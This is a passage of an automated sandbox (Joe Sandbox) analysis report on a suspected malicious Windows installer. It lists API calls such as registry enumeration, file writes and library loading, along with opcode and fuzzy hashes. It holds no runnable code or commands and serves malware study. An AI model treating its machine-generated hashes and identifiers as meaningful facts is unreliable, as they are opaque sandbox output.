                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                          • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                          • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                          • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 00402557
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                          • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                          • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                          • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                          • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                          • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                          • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                          APIs
                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405D76
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                          • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID:
                                                          • API String ID: 1892508949-0
                                                          • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                          • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                          • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                          • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 00402557
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                          • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                          • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                          • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                          • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                          • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                          • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                          • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                          • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                          • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                          • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                          • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                          • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                            • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                            • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                            • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                          • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                          • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                          • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00405EE2
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                          • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                          • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                          • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                          • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                          • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                          • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                          APIs
                                                          • EnumWindows.USER32(00000000), ref: 6EAB2B6B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: EnumWindows
                                                          • String ID:
                                                          • API String ID: 1129996299-0
                                                          • Opcode ID: ad2f06501c761db1e545b20c0a67cb420b34c1862615a4362c6233fd8d9d1160
                                                          • Instruction ID: ea298da2d34af3fe10d12d9d5c722fbbfa664de2ed89a5f01a00629dc21eeb6f
                                                          • Opcode Fuzzy Hash: ad2f06501c761db1e545b20c0a67cb420b34c1862615a4362c6233fd8d9d1160
                                                          • Instruction Fuzzy Hash: DC415D719046049FDB20DFE4DA81B99777DFF0A368F20882BE404AB110DB3498C69BB9
                                                          APIs
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                          • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                          • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                          • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                          • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                          • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                          • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                          APIs
                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                          APIs
                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004128C8,0040CED0,004033DE,0040CED0,004128C8,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
